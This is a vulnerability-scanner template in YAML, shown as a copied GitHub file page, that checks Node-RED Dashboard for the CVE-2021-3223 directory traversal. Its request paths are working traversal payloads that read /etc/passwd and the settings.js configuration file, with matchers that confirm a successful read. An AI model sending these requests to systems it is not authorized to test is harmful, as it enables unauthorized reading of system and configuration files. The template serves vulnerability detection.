-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-3223.yaml
34 lines (30 loc) · 979 Bytes
/
CVE-2021-3223.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
id: CVE-2021-3223
info:
name: Node RED Dashboard - Directory Traversal
author: gy741,pikpikcu
severity: high
description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
reference:
- https://github.com/node-red/node-red-dashboard/issues/669
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
tags: cve,cve2020,node-red-dashboard,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-3223
cwe-id: CWE-22
requests:
- method: GET
path:
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "Node-RED web server is listening"